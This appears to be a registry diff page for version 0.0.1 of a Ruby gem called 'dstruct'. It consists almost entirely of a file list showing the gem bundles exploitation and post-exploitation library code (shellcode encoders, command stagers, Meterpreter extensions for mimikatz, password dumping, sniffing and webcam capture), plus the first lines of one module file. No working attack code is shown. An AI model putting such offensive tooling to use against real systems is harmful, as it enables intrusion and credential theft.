dstruct 0.0.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- checksums.yaml +15 -0
- data/README.markdown +23 -0
- data/examples/smb_example.rb +35 -0
- data/lib/rex.rb +108 -0
- data/lib/rex/LICENSE +29 -0
- data/lib/rex/arch.rb +104 -0
- data/lib/rex/arch/sparc.rb +75 -0
- data/lib/rex/arch/x86.rb +524 -0
- data/lib/rex/assembly/nasm.rb +104 -0
- data/lib/rex/codepage.map +104 -0
- data/lib/rex/compat.rb +389 -0
- data/lib/rex/constants.rb +124 -0
- data/lib/rex/elfparsey.rb +9 -0
- data/lib/rex/elfparsey/elf.rb +121 -0
- data/lib/rex/elfparsey/elfbase.rb +256 -0
- data/lib/rex/elfparsey/exceptions.rb +25 -0
- data/lib/rex/elfscan.rb +10 -0
- data/lib/rex/elfscan/scanner.rb +226 -0
- data/lib/rex/elfscan/search.rb +44 -0
- data/lib/rex/encoder/alpha2.rb +31 -0
- data/lib/rex/encoder/alpha2/alpha_mixed.rb +68 -0
- data/lib/rex/encoder/alpha2/alpha_upper.rb +79 -0
- data/lib/rex/encoder/alpha2/generic.rb +90 -0
- data/lib/rex/encoder/alpha2/unicode_mixed.rb +116 -0
- data/lib/rex/encoder/alpha2/unicode_upper.rb +123 -0
- data/lib/rex/encoder/bloxor/bloxor.rb +327 -0
- data/lib/rex/encoder/ndr.rb +90 -0
- data/lib/rex/encoder/nonalpha.rb +61 -0
- data/lib/rex/encoder/nonupper.rb +64 -0
- data/lib/rex/encoder/xdr.rb +107 -0
- data/lib/rex/encoder/xor.rb +69 -0
- data/lib/rex/encoder/xor/dword.rb +13 -0
- data/lib/rex/encoder/xor/dword_additive.rb +13 -0
- data/lib/rex/encoders/xor_dword.rb +35 -0
- data/lib/rex/encoders/xor_dword_additive.rb +53 -0
- data/lib/rex/encoding/xor.rb +20 -0
- data/lib/rex/encoding/xor/byte.rb +15 -0
- data/lib/rex/encoding/xor/dword.rb +21 -0
- data/lib/rex/encoding/xor/dword_additive.rb +92 -0
- data/lib/rex/encoding/xor/exceptions.rb +17 -0
- data/lib/rex/encoding/xor/generic.rb +146 -0
- data/lib/rex/encoding/xor/qword.rb +15 -0
- data/lib/rex/encoding/xor/word.rb +21 -0
- data/lib/rex/exceptions.rb +275 -0
- data/lib/rex/exploitation/cmdstager.rb +10 -0
- data/lib/rex/exploitation/cmdstager/base.rb +190 -0
- data/lib/rex/exploitation/cmdstager/bourne.rb +105 -0
- data/lib/rex/exploitation/cmdstager/debug_asm.rb +140 -0
- data/lib/rex/exploitation/cmdstager/debug_write.rb +134 -0
- data/lib/rex/exploitation/cmdstager/echo.rb +164 -0
- data/lib/rex/exploitation/cmdstager/printf.rb +122 -0
- data/lib/rex/exploitation/cmdstager/tftp.rb +71 -0
- data/lib/rex/exploitation/cmdstager/vbs.rb +126 -0
- data/lib/rex/exploitation/egghunter.rb +425 -0
- data/lib/rex/exploitation/encryptjs.rb +78 -0
- data/lib/rex/exploitation/heaplib.js.b64 +331 -0
- data/lib/rex/exploitation/heaplib.rb +107 -0
- data/lib/rex/exploitation/js.rb +6 -0
- data/lib/rex/exploitation/js/detect.rb +69 -0
- data/lib/rex/exploitation/js/memory.rb +81 -0
- data/lib/rex/exploitation/js/network.rb +84 -0
- data/lib/rex/exploitation/js/utils.rb +33 -0
- data/lib/rex/exploitation/jsobfu.rb +513 -0
- data/lib/rex/exploitation/obfuscatejs.rb +336 -0
- data/lib/rex/exploitation/omelet.rb +321 -0
- data/lib/rex/exploitation/opcodedb.rb +819 -0
- data/lib/rex/exploitation/powershell.rb +62 -0
- data/lib/rex/exploitation/powershell/function.rb +63 -0
- data/lib/rex/exploitation/powershell/obfu.rb +98 -0
- data/lib/rex/exploitation/powershell/output.rb +151 -0
- data/lib/rex/exploitation/powershell/param.rb +23 -0
- data/lib/rex/exploitation/powershell/parser.rb +183 -0
- data/lib/rex/exploitation/powershell/psh_methods.rb +70 -0
- data/lib/rex/exploitation/powershell/script.rb +99 -0
- data/lib/rex/exploitation/ropdb.rb +190 -0
- data/lib/rex/exploitation/seh.rb +93 -0
- data/lib/rex/file.rb +160 -0
- data/lib/rex/image_source.rb +10 -0
- data/lib/rex/image_source/disk.rb +58 -0
- data/lib/rex/image_source/image_source.rb +44 -0
- data/lib/rex/image_source/memory.rb +35 -0
- data/lib/rex/io/bidirectional_pipe.rb +161 -0
- data/lib/rex/io/datagram_abstraction.rb +35 -0
- data/lib/rex/io/ring_buffer.rb +369 -0
- data/lib/rex/io/stream.rb +312 -0
- data/lib/rex/io/stream_abstraction.rb +209 -0
- data/lib/rex/io/stream_server.rb +221 -0
- data/lib/rex/job_container.rb +200 -0
- data/lib/rex/logging.rb +4 -0
- data/lib/rex/logging/log_dispatcher.rb +180 -0
- data/lib/rex/logging/log_sink.rb +43 -0
- data/lib/rex/logging/sinks/flatfile.rb +56 -0
- data/lib/rex/logging/sinks/stderr.rb +44 -0
- data/lib/rex/mac_oui.rb +16581 -0
- data/lib/rex/machparsey.rb +9 -0
- data/lib/rex/machparsey/exceptions.rb +34 -0
- data/lib/rex/machparsey/mach.rb +209 -0
- data/lib/rex/machparsey/machbase.rb +408 -0
- data/lib/rex/machscan.rb +9 -0
- data/lib/rex/machscan/scanner.rb +217 -0
- data/lib/rex/mime.rb +10 -0
- data/lib/rex/mime/encoding.rb +17 -0
- data/lib/rex/mime/header.rb +78 -0
- data/lib/rex/mime/message.rb +150 -0
- data/lib/rex/mime/part.rb +50 -0
- data/lib/rex/nop/opty2.rb +109 -0
- data/lib/rex/nop/opty2_tables.rb +301 -0
- data/lib/rex/ole.rb +202 -0
- data/lib/rex/ole/clsid.rb +44 -0
- data/lib/rex/ole/difat.rb +138 -0
- data/lib/rex/ole/directory.rb +228 -0
- data/lib/rex/ole/direntry.rb +237 -0
- data/lib/rex/ole/docs/dependencies.txt +8 -0
- data/lib/rex/ole/docs/references.txt +1 -0
- data/lib/rex/ole/fat.rb +96 -0
- data/lib/rex/ole/header.rb +201 -0
- data/lib/rex/ole/minifat.rb +74 -0
- data/lib/rex/ole/propset.rb +141 -0
- data/lib/rex/ole/samples/create_ole.rb +27 -0
- data/lib/rex/ole/samples/dir.rb +35 -0
- data/lib/rex/ole/samples/dump_stream.rb +34 -0
- data/lib/rex/ole/samples/ole_info.rb +23 -0
- data/lib/rex/ole/storage.rb +392 -0
- data/lib/rex/ole/stream.rb +50 -0
- data/lib/rex/ole/substorage.rb +46 -0
- data/lib/rex/ole/util.rb +154 -0
- data/lib/rex/parser/acunetix_nokogiri.rb +406 -0
- data/lib/rex/parser/apple_backup_manifestdb.rb +132 -0
- data/lib/rex/parser/appscan_nokogiri.rb +367 -0
- data/lib/rex/parser/arguments.rb +108 -0
- data/lib/rex/parser/burp_session_nokogiri.rb +291 -0
- data/lib/rex/parser/ci_nokogiri.rb +193 -0
- data/lib/rex/parser/foundstone_nokogiri.rb +342 -0
- data/lib/rex/parser/fusionvm_nokogiri.rb +109 -0
- data/lib/rex/parser/group_policy_preferences.rb +185 -0
- data/lib/rex/parser/ini.rb +186 -0
- data/lib/rex/parser/ip360_aspl_xml.rb +103 -0
- data/lib/rex/parser/ip360_xml.rb +98 -0
- data/lib/rex/parser/mbsa_nokogiri.rb +256 -0
- data/lib/rex/parser/nessus_xml.rb +121 -0
- data/lib/rex/parser/netsparker_xml.rb +109 -0
- data/lib/rex/parser/nexpose_raw_nokogiri.rb +686 -0
- data/lib/rex/parser/nexpose_simple_nokogiri.rb +330 -0
- data/lib/rex/parser/nexpose_xml.rb +172 -0
- data/lib/rex/parser/nmap_nokogiri.rb +394 -0
- data/lib/rex/parser/nmap_xml.rb +166 -0
- data/lib/rex/parser/nokogiri_doc_mixin.rb +233 -0
- data/lib/rex/parser/openvas_nokogiri.rb +172 -0
- data/lib/rex/parser/outpost24_nokogiri.rb +240 -0
- data/lib/rex/parser/retina_xml.rb +110 -0
- data/lib/rex/parser/unattend.rb +171 -0
- data/lib/rex/parser/wapiti_nokogiri.rb +105 -0
- data/lib/rex/payloads.rb +2 -0
- data/lib/rex/payloads/win32.rb +3 -0
- data/lib/rex/payloads/win32/common.rb +27 -0
- data/lib/rex/payloads/win32/kernel.rb +54 -0
- data/lib/rex/payloads/win32/kernel/common.rb +55 -0
- data/lib/rex/payloads/win32/kernel/migration.rb +13 -0
- data/lib/rex/payloads/win32/kernel/recovery.rb +51 -0
- data/lib/rex/payloads/win32/kernel/stager.rb +195 -0
- data/lib/rex/peparsey.rb +10 -0
- data/lib/rex/peparsey/exceptions.rb +30 -0
- data/lib/rex/peparsey/pe.rb +210 -0
- data/lib/rex/peparsey/pe_memdump.rb +61 -0
- data/lib/rex/peparsey/pebase.rb +1662 -0
- data/lib/rex/peparsey/section.rb +128 -0
- data/lib/rex/pescan.rb +11 -0
- data/lib/rex/pescan/analyze.rb +366 -0
- data/lib/rex/pescan/scanner.rb +230 -0
- data/lib/rex/pescan/search.rb +68 -0
- data/lib/rex/platforms.rb +2 -0
- data/lib/rex/platforms/windows.rb +52 -0
- data/lib/rex/poly.rb +134 -0
- data/lib/rex/poly/block.rb +480 -0
- data/lib/rex/poly/machine.rb +13 -0
- data/lib/rex/poly/machine/machine.rb +830 -0
- data/lib/rex/poly/machine/x86.rb +509 -0
- data/lib/rex/poly/register.rb +101 -0
- data/lib/rex/poly/register/x86.rb +41 -0
- data/lib/rex/post.rb +7 -0
- data/lib/rex/post/dir.rb +51 -0
- data/lib/rex/post/file.rb +172 -0
- data/lib/rex/post/file_stat.rb +220 -0
- data/lib/rex/post/gen.pl +13 -0
- data/lib/rex/post/io.rb +182 -0
- data/lib/rex/post/meterpreter.rb +5 -0
- data/lib/rex/post/meterpreter/channel.rb +446 -0
- data/lib/rex/post/meterpreter/channel_container.rb +54 -0
- data/lib/rex/post/meterpreter/channels/pool.rb +160 -0
- data/lib/rex/post/meterpreter/channels/pools/file.rb +62 -0
- data/lib/rex/post/meterpreter/channels/pools/stream_pool.rb +103 -0
- data/lib/rex/post/meterpreter/channels/stream.rb +87 -0
- data/lib/rex/post/meterpreter/client.rb +483 -0
- data/lib/rex/post/meterpreter/client_core.rb +352 -0
- data/lib/rex/post/meterpreter/dependencies.rb +3 -0
- data/lib/rex/post/meterpreter/extension.rb +32 -0
- data/lib/rex/post/meterpreter/extensions/android/android.rb +128 -0
- data/lib/rex/post/meterpreter/extensions/android/tlv.rb +40 -0
- data/lib/rex/post/meterpreter/extensions/espia/espia.rb +58 -0
- data/lib/rex/post/meterpreter/extensions/espia/tlv.rb +17 -0
- data/lib/rex/post/meterpreter/extensions/extapi/adsi/adsi.rb +71 -0
- data/lib/rex/post/meterpreter/extensions/extapi/clipboard/clipboard.rb +169 -0
- data/lib/rex/post/meterpreter/extensions/extapi/extapi.rb +45 -0
- data/lib/rex/post/meterpreter/extensions/extapi/service/service.rb +104 -0
- data/lib/rex/post/meterpreter/extensions/extapi/tlv.rb +77 -0
- data/lib/rex/post/meterpreter/extensions/extapi/window/window.rb +56 -0
- data/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb +75 -0
- data/lib/rex/post/meterpreter/extensions/incognito/incognito.rb +94 -0
- data/lib/rex/post/meterpreter/extensions/incognito/tlv.rb +22 -0
- data/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb +361 -0
- data/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb +76 -0
- data/lib/rex/post/meterpreter/extensions/lanattacks/dhcp/dhcp.rb +78 -0
- data/lib/rex/post/meterpreter/extensions/lanattacks/lanattacks.rb +43 -0
- data/lib/rex/post/meterpreter/extensions/lanattacks/tftp/tftp.rb +49 -0
- data/lib/rex/post/meterpreter/extensions/lanattacks/tlv.rb +17 -0
- data/lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb +128 -0
- data/lib/rex/post/meterpreter/extensions/mimikatz/tlv.rb +16 -0
- data/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb +57 -0
- data/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb +16 -0
- data/lib/rex/post/meterpreter/extensions/priv/fs.rb +118 -0
- data/lib/rex/post/meterpreter/extensions/priv/passwd.rb +61 -0
- data/lib/rex/post/meterpreter/extensions/priv/priv.rb +109 -0
- data/lib/rex/post/meterpreter/extensions/priv/tlv.rb +29 -0
- data/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb +117 -0
- data/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb +27 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/constants.rb +396 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb +284 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb +399 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/fs/file_stat.rb +104 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/fs/io.rb +48 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/net/arp.rb +59 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb +256 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/net/interface.rb +129 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/net/netstat.rb +97 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/net/resolve.rb +106 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/net/route.rb +67 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb +139 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb +180 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb +168 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb +209 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb +38146 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/buffer_item.rb +48 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb +2102 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_crypt32.rb +32 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_iphlpapi.rb +97 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_kernel32.rb +3852 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_netapi32.rb +100 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ntdll.rb +168 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_psapi.rb +32 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_shell32.rb +32 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_user32.rb +3170 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_version.rb +41 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wlanapi.rb +87 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb +128 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ws2_32.rb +613 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll.rb +388 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_function.rb +111 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_helper.rb +149 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_wrapper.rb +27 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/mock_magic.rb +515 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/multicall.rb +319 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/platform_util.rb +23 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb +301 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/tlv.rb +56 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/type/pointer_util.rb +106 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/util.rb +676 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb +96 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb +151 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb +128 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb +192 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log_subsystem/event_record.rb +41 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb +60 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb +408 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/image.rb +129 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/io.rb +55 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb +336 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/thread.rb +141 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb +328 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb +193 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_value.rb +102 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/remote_registry_key.rb +188 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb +180 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb +236 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/ui.rb +259 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb +201 -0
- data/lib/rex/post/meterpreter/inbound_packet_handler.rb +30 -0
- data/lib/rex/post/meterpreter/object_aliases.rb +83 -0
- data/lib/rex/post/meterpreter/packet.rb +709 -0
- data/lib/rex/post/meterpreter/packet_dispatcher.rb +543 -0
- data/lib/rex/post/meterpreter/packet_parser.rb +94 -0
- data/lib/rex/post/meterpreter/packet_response_waiter.rb +83 -0
- data/lib/rex/post/meterpreter/ui/console.rb +142 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher.rb +86 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb +383 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +939 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb +109 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi.rb +65 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/adsi.rb +198 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard.rb +444 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/service.rb +199 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/window.rb +118 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/wmi.rb +108 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb +242 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb +509 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks.rb +60 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/dhcp.rb +254 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/tftp.rb +159 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb +182 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb +232 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb +62 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb +97 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb +52 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb +133 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb +204 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi.rb +66 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb +527 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb +448 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +906 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb +318 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb +343 -0
- data/lib/rex/post/meterpreter/ui/console/interactive_channel.rb +99 -0
- data/lib/rex/post/permission.rb +26 -0
- data/lib/rex/post/process.rb +57 -0
- data/lib/rex/post/thread.rb +57 -0
- data/lib/rex/post/ui.rb +52 -0
- data/lib/rex/proto.rb +15 -0
- data/lib/rex/proto/addp.rb +218 -0
- data/lib/rex/proto/dcerpc.rb +7 -0
- data/lib/rex/proto/dcerpc/client.rb +362 -0
- data/lib/rex/proto/dcerpc/exceptions.rb +151 -0
- data/lib/rex/proto/dcerpc/handle.rb +48 -0
- data/lib/rex/proto/dcerpc/ndr.rb +73 -0
- data/lib/rex/proto/dcerpc/packet.rb +264 -0
- data/lib/rex/proto/dcerpc/response.rb +188 -0
- data/lib/rex/proto/dcerpc/uuid.rb +85 -0
- data/lib/rex/proto/dcerpc/wdscp.rb +3 -0
- data/lib/rex/proto/dcerpc/wdscp/constants.rb +89 -0
- data/lib/rex/proto/dcerpc/wdscp/packet.rb +94 -0
- data/lib/rex/proto/dhcp.rb +7 -0
- data/lib/rex/proto/dhcp/constants.rb +34 -0
- data/lib/rex/proto/dhcp/server.rb +334 -0
- data/lib/rex/proto/drda.rb +6 -0
- data/lib/rex/proto/drda/constants.rb +50 -0
- data/lib/rex/proto/drda/packet.rb +253 -0
- data/lib/rex/proto/drda/utils.rb +124 -0
- data/lib/rex/proto/http.rb +7 -0
- data/lib/rex/proto/http/client.rb +722 -0
- data/lib/rex/proto/http/client_request.rb +472 -0
- data/lib/rex/proto/http/handler.rb +47 -0
- data/lib/rex/proto/http/handler/erb.rb +129 -0
- data/lib/rex/proto/http/handler/proc.rb +61 -0
- data/lib/rex/proto/http/header.rb +173 -0
- data/lib/rex/proto/http/packet.rb +414 -0
- data/lib/rex/proto/http/request.rb +354 -0
- data/lib/rex/proto/http/response.rb +151 -0
- data/lib/rex/proto/http/server.rb +385 -0
- data/lib/rex/proto/iax2.rb +2 -0
- data/lib/rex/proto/iax2/call.rb +326 -0
- data/lib/rex/proto/iax2/client.rb +218 -0
- data/lib/rex/proto/iax2/codecs.rb +5 -0
- data/lib/rex/proto/iax2/codecs/alaw.rb +16 -0
- data/lib/rex/proto/iax2/codecs/g711.rb +2176 -0
- data/lib/rex/proto/iax2/codecs/mulaw.rb +17 -0
- data/lib/rex/proto/iax2/constants.rb +262 -0
- data/lib/rex/proto/ipmi.rb +57 -0
- data/lib/rex/proto/ipmi/channel_auth_reply.rb +89 -0
- data/lib/rex/proto/ipmi/open_session_reply.rb +36 -0
- data/lib/rex/proto/ipmi/rakp2.rb +36 -0
- data/lib/rex/proto/ipmi/utils.rb +125 -0
- data/lib/rex/proto/natpmp.rb +7 -0
- data/lib/rex/proto/natpmp/constants.rb +19 -0
- data/lib/rex/proto/natpmp/packet.rb +45 -0
- data/lib/rex/proto/ntlm.rb +8 -0
- data/lib/rex/proto/ntlm/base.rb +327 -0
- data/lib/rex/proto/ntlm/constants.rb +75 -0
- data/lib/rex/proto/ntlm/crypt.rb +412 -0
- data/lib/rex/proto/ntlm/exceptions.rb +17 -0
- data/lib/rex/proto/ntlm/message.rb +534 -0
- data/lib/rex/proto/ntlm/utils.rb +765 -0
- data/lib/rex/proto/ntp.rb +3 -0
- data/lib/rex/proto/ntp/constants.rb +12 -0
- data/lib/rex/proto/ntp/modes.rb +130 -0
- data/lib/rex/proto/pjl.rb +31 -0
- data/lib/rex/proto/pjl/client.rb +163 -0
- data/lib/rex/proto/proxy/socks4a.rb +441 -0
- data/lib/rex/proto/rfb.rb +13 -0
- data/lib/rex/proto/rfb/cipher.rb +82 -0
- data/lib/rex/proto/rfb/client.rb +205 -0
- data/lib/rex/proto/rfb/constants.rb +50 -0
- data/lib/rex/proto/sip.rb +4 -0
- data/lib/rex/proto/sip/response.rb +61 -0
- data/lib/rex/proto/smb.rb +8 -0
- data/lib/rex/proto/smb/client.rb +2064 -0
- data/lib/rex/proto/smb/constants.rb +1064 -0
- data/lib/rex/proto/smb/crypt.rb +37 -0
- data/lib/rex/proto/smb/evasions.rb +67 -0
- data/lib/rex/proto/smb/exceptions.rb +867 -0
- data/lib/rex/proto/smb/simpleclient.rb +173 -0
- data/lib/rex/proto/smb/simpleclient/open_file.rb +106 -0
- data/lib/rex/proto/smb/simpleclient/open_pipe.rb +57 -0
- data/lib/rex/proto/smb/utils.rb +104 -0
- data/lib/rex/proto/sunrpc.rb +2 -0
- data/lib/rex/proto/sunrpc/client.rb +196 -0
- data/lib/rex/proto/tftp.rb +13 -0
- data/lib/rex/proto/tftp/client.rb +344 -0
- data/lib/rex/proto/tftp/constants.rb +39 -0
- data/lib/rex/proto/tftp/server.rb +497 -0
- data/lib/rex/random_identifier_generator.rb +177 -0
- data/lib/rex/registry.rb +14 -0
- data/lib/rex/registry/hive.rb +132 -0
- data/lib/rex/registry/lfkey.rb +51 -0
- data/lib/rex/registry/nodekey.rb +54 -0
- data/lib/rex/registry/regf.rb +25 -0
- data/lib/rex/registry/valuekey.rb +67 -0
- data/lib/rex/registry/valuelist.rb +29 -0
- data/lib/rex/ropbuilder.rb +8 -0
- data/lib/rex/ropbuilder/rop.rb +271 -0
- data/lib/rex/script.rb +42 -0
- data/lib/rex/script/base.rb +61 -0
- data/lib/rex/script/meterpreter.rb +16 -0
- data/lib/rex/script/shell.rb +10 -0
- data/lib/rex/service.rb +49 -0
- data/lib/rex/service_manager.rb +154 -0
- data/lib/rex/services/local_relay.rb +424 -0
- data/lib/rex/socket.rb +788 -0
- data/lib/rex/socket/comm.rb +120 -0
- data/lib/rex/socket/comm/local.rb +526 -0
- data/lib/rex/socket/ip.rb +132 -0
- data/lib/rex/socket/parameters.rb +363 -0
- data/lib/rex/socket/range_walker.rb +470 -0
- data/lib/rex/socket/ssl_tcp.rb +345 -0
- data/lib/rex/socket/ssl_tcp_server.rb +188 -0
- data/lib/rex/socket/subnet_walker.rb +76 -0
- data/lib/rex/socket/switch_board.rb +289 -0
- data/lib/rex/socket/tcp.rb +79 -0
- data/lib/rex/socket/tcp_server.rb +67 -0
- data/lib/rex/socket/udp.rb +165 -0
- data/lib/rex/sslscan/result.rb +201 -0
- data/lib/rex/sslscan/scanner.rb +206 -0
- data/lib/rex/struct2.rb +5 -0
- data/lib/rex/struct2/c_struct.rb +181 -0
- data/lib/rex/struct2/c_struct_template.rb +39 -0
- data/lib/rex/struct2/constant.rb +26 -0
- data/lib/rex/struct2/element.rb +44 -0
- data/lib/rex/struct2/generic.rb +73 -0
- data/lib/rex/struct2/restraint.rb +54 -0
- data/lib/rex/struct2/s_string.rb +72 -0
- data/lib/rex/struct2/s_struct.rb +111 -0
- data/lib/rex/sync.rb +6 -0
- data/lib/rex/sync/event.rb +85 -0
- data/lib/rex/sync/read_write_lock.rb +177 -0
- data/lib/rex/sync/ref.rb +58 -0
- data/lib/rex/sync/thread_safe.rb +83 -0
- data/lib/rex/text.rb +1813 -0
- data/lib/rex/thread_factory.rb +43 -0
- data/lib/rex/time.rb +66 -0
- data/lib/rex/transformer.rb +116 -0
- data/lib/rex/ui.rb +22 -0
- data/lib/rex/ui/interactive.rb +304 -0
- data/lib/rex/ui/output.rb +85 -0
- data/lib/rex/ui/output/none.rb +19 -0
- data/lib/rex/ui/progress_tracker.rb +97 -0
- data/lib/rex/ui/subscriber.rb +160 -0
- data/lib/rex/ui/text/color.rb +98 -0
- data/lib/rex/ui/text/dispatcher_shell.rb +538 -0
- data/lib/rex/ui/text/input.rb +119 -0
- data/lib/rex/ui/text/input/buffer.rb +79 -0
- data/lib/rex/ui/text/input/readline.rb +129 -0
- data/lib/rex/ui/text/input/socket.rb +96 -0
- data/lib/rex/ui/text/input/stdio.rb +46 -0
- data/lib/rex/ui/text/irb_shell.rb +62 -0
- data/lib/rex/ui/text/output.rb +86 -0
- data/lib/rex/ui/text/output/buffer.rb +62 -0
- data/lib/rex/ui/text/output/buffer/stdout.rb +26 -0
- data/lib/rex/ui/text/output/file.rb +44 -0
- data/lib/rex/ui/text/output/socket.rb +44 -0
- data/lib/rex/ui/text/output/stdio.rb +53 -0
- data/lib/rex/ui/text/output/tee.rb +56 -0
- data/lib/rex/ui/text/progress_tracker.rb +57 -0
- data/lib/rex/ui/text/shell.rb +403 -0
- data/lib/rex/ui/text/table.rb +346 -0
- data/lib/rex/zip.rb +96 -0
- data/lib/rex/zip/archive.rb +130 -0
- data/lib/rex/zip/blocks.rb +184 -0
- data/lib/rex/zip/entry.rb +122 -0
- data/lib/rex/zip/jar.rb +283 -0
- data/lib/rex/zip/samples/comment.rb +32 -0
- data/lib/rex/zip/samples/mkwar.rb +138 -0
- data/lib/rex/zip/samples/mkzip.rb +19 -0
- data/lib/rex/zip/samples/recursive.rb +58 -0
- metadata +536 -0
|
@@ -0,0 +1,109 @@
|
|
|
1
|
+
# -*- coding: binary -*-
|
|
2
|
+
require 'rex/post/meterpreter'
|
|
3
|
+
|
|
4
|
+
module Rex
|
|
5
|
+
module Post
|
|
6
|
+
module Meterpreter
|
|
7
|
+
module Ui
|
|
8
|
+
|
|
9
|
+
###
|
|
10
|
+
#
|
|
